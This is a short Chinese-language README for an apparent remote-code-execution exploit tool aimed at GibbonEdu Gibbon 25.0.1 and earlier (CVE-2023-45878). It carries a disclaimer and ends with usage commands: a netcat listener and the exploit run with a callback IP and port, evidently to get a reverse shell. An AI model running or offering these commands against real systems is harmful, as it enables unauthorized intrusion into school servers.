GibbonEdu Gibbon 版本 25.0.1 及之前存在任意文件写入漏洞
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
此漏洞利用代码仅供教育和研究目的使用。未经明确许可,将此代码用于目标系统是非法行为,可能违反多个司法管辖区的网络犯罪法律。对于因使用该漏洞利用代码而引起的任何滥用或损害,我不承担任何责任。
用户有责任在运行此代码前确保遵守所有适用法律和道德准则。请勿将此漏洞利用代码用于恶意活动。
此漏洞利用代码仅适用于 Windows Server。如果易受攻击的 Gibbon 版本运行在 Linux 服务器上,你需要相应修改漏洞利用代码。
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> 或 ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>